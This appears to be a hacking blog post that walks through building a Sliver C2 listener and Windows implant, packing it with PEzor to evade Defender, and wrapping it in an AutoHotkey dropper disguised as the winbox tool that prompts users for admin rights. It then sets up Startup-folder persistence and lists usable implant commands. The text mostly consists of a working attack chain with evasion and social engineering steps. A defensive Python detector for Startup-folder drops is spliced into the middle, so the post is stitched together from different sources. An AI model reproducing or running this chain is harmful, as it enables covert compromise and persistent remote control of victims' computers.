So, let's talk a bit about persistence in Windows and Sliver, and a bit about encryption and AHK. We should be in for a fun night :)
First, read PEzor and Sliver C2 to get up to speed, and let's have some fun.
First, get PEzor and Sliver set up and working. If you want to build the AHK social engineering files, you need a Windows workstation with the Autohotkey development kit set up, but AHK is optional.
The Autohotkey dev kit can be downloaded here https://downloads.blackdragon.se/AHK_Dev_Tools.zip
First things first: start sliver-server and generate the mtls listener, like so.
mtls -L YOUR-IP -l your_listening_port
# For ip 10.0.0.52 and port 443
mtls -L 10.0.0.52 -l 443
# Confirm with the jobs command
sliver (SMALL_UNDERSTANDING) > jobs
ID Name Protocol Port
==== ====== ========== ======
1 mtls tcp 443
[server] sliver >
Next, we need a payload for that listener; for that we use the generate command in Sliver.
# Generate a Sliver implant for the listener's IP and PORT
# Again, here it's for 10.0.0.52 and port 443
[server] sliver > generate -e -m 10.0.0.52:443 -o windows
So, when we're done with that and have a Sliver implant, it's time to get the fun stuff going. We're going to encrypt and pack it with PEzor, so start PEzor with -h to see the help.
The command I used was this.
PEzor.sh -64 -sgn -unhook -antidebug -text -sleep=120 /path/to/payload.exe
If all worked out, we have a file called payload.exe.packed.exe, and that's our encrypted loader. Copy it to a Windows desktop and scan it with Defender; it should pass with no problem.
Now, for the social engineering part. See, the problem is that our encrypted file doesn't really do anything, it shows no output, so we need something to show the user. If you have the Autohotkey Dev Kit and AHK-Studio set up, open a new project and paste this in.
cat -n winbox_loader.ahk
1 #NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
2 ; #Warn ; Enable warnings to assist with detecting common errors.
3 ;@Ahk2Exe-SetMainIcon %A_ScriptDir%\winbox.ico
4 SendMode Input ; Recommended for new scripts due to its superior speed and reliability.
5 SetWorkingDir %A_ScriptDir% ; Ensures a consistent starting directory.
6 FileInstall, winbox.exe , c:\%TEMP%\winbox.exe, 1
7 FileInstall, freckle_packed.exe, c:\%TEMP%\freckle_packed.exe, 1
8 ;A random variable to help obfuscate code
9 MyRandomShit = just some6493469 random96763496 garble to create entropy
10 if A_IsAdmin
11 {
12 Run, "c:\%TEMP%\winbox.exe"
13 Run, "c:\%temp%\freckle_packed.exe"
14 }
15 else
16 {
17 MsgBox,," Run as admin, This file needs Admin - Right-click and choose run as administrator ",
18 }
Now, let's go through it a bit. In line 3, we set an AHK-Compiler directive to set the main icon. Since I'm using the winbox software, I found the winbox icon, ran it through an online png-to-ico converter, and saved it into the project folder, alongside my ahk script, my payload.packed.exe file and the winbox program.
So, lines 6 and 7 should be changed to match your main program name and payload, and change the comment and junk variable in lines 8 and 9 to vary the file a bit.
Now, in lines 12 and 13, we define what we want to run and from where. If you just adjust winbox.exe and freckle_packed.exe to your own values, then go to main and choose compile, it should build in AHK-Studio.
For a quick test, simply run the packed .exe file and see if you get a shell back in Sliver (you should), then switch to it using the use command.
Now, once you're in a Sliver session, the first thing we need to do is set up persistence. Since we have a payload file, we simply navigate to c:\Users\username\appdata\Roaming\Microsoft\Windows.
Now, we pause for a bit. Try to run an ls command in the Sliver shell, and you should see a folder called "Start Menu". The problem is that Sliver's mv command doesn't do well with spaces, so we cd into it one folder at a time, quoting the name, like this.
[server] sliver > cd "Start Menu"
From here, we jump into "Programmer" / "Programs" and "Start" / "Startup", and move our payload from its current position into its final place. But why here? Because everything in this folder is run at login, so if we lose our shell, we get it back the next time the user logs in :)
Now, a bit about the Sliver commands. The problem is that, when we're using encrypted runners, some things break, so we only have the following commands to work with in Sliver.
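On the defender side, the Startup folder used above is one of the first places to check for this kind of persistence. The following is an added example (not code from the original post or from Sliver) that scans file paths taken from a constructed listing or file-event telemetry and flags anything executable dropped straight into a Startup folder; the user name, file names and paths are assumptions made for the sample.

```python
import ntpath
import re
from typing import List, Optional, Tuple

# Folders Windows runs at logon. The on-disk names stay English even when
# Explorer shows localized names such as "Programmer" / "Start".
STARTUP_PATTERNS = [
    # Per-user: C:\Users\<name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\microsoft\\windows\\"
               r"start menu\\programs\\startup\\", re.I),
    # All users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
    re.compile(r"^[a-z]:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\", re.I),
]

# Installers normally drop .lnk shortcuts into Startup; a bare executable
# or script sitting there is unusual and worth a look.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd",
                   ".vbs", ".js", ".jse", ".wsf", ".ps1", ".hta"}

def in_startup_folder(path: str) -> bool:
    return any(p.match(path) for p in STARTUP_PATTERNS)

def startup_entry_finding(path: str) -> Optional[str]:
    """Return a reason string if the path is a suspicious Startup entry, else None."""
    if not in_startup_folder(path):
        return None
    name = ntpath.basename(path)
    ext = ntpath.splitext(name)[1].lower()   # ".exe" for "payload.exe.packed.exe"
    if ext in EXEC_EXTENSIONS:
        return f"executable dropped directly in Startup: {name}"
    if ext == "":
        return f"extensionless file in Startup: {name}"
    return None   # .lnk shortcuts and desktop.ini are normal here

def scan(paths: List[str]) -> List[Tuple[str, str]]:
    """Return (path, reason) for every path that looks like Startup persistence."""
    return [(p, r) for p in paths if (r := startup_entry_finding(p))]

# Constructed sample listing: two normal entries, two drops, one non-Startup path.
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe.packed.exe",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\update.vbs",
    r"C:\Users\alice\AppData\Local\Temp\winbox.exe",
]

if __name__ == "__main__":
    for path, reason in scan(SAMPLE_PATHS):
        print(f"{reason}\n    {path}")
```

Resolving the targets of .lnk files in the same folders catches the shortcut variant of the same technique.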
cat Dump file to stdout
cd Change directory
close Close an interactive session without killing the remote process
download Download a file
# execute Execute a program on the remote system
# execute-shellcode Executes the given shellcode in the sliver process
extensions Manage extensions
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
* interactive Task a beacon to open an interactive session (Beacon only)
* kill Kill a session
ls List current directory
mkdir Make a directory
* msf Execute an MSF payload in the current process
* msf-inject Inject an MSF payload into a process
mv Move or rename a file
netstat Print network connection information
* ping Send round trip message to implant (does not use ICMP)
* pivots List pivots for active session
* portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active beacon/session
rename Rename the active beacon/session
rm Remove a file or directory
screenshot Take a screenshot
# shell Start an interactive shell
* sideload Load and execute a shared object (shared library/DLL) in a remote process
* socks5 In-band SOCKS5 Proxy
* ssh Run a SSH command on a remote host
* terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
# Breaks the sliver session to the target - DON'T USE !!
* Not yet tested - more to follow :)
So, there's some stuff missing, but I'm working on it. I know Sliver should be able to use "stagers" / "staging shellcode", but this hasn't been tested enough for me to do a piece on it, but I'm working on it :)
Also note, we don't have the shell command; it breaks the session AND gets us caught by AV, so we'll have to manage without it I guess ;)
But what could be done from here on? Well, some custom-written persistence malware to play with AV, setting up folders so AV won't scan them, and downloading a real session and tools for elevating rights on the system would be the next step, plus some more looking into standard writable folder locations, but that's for another piece :)
Much Happy Hacking :)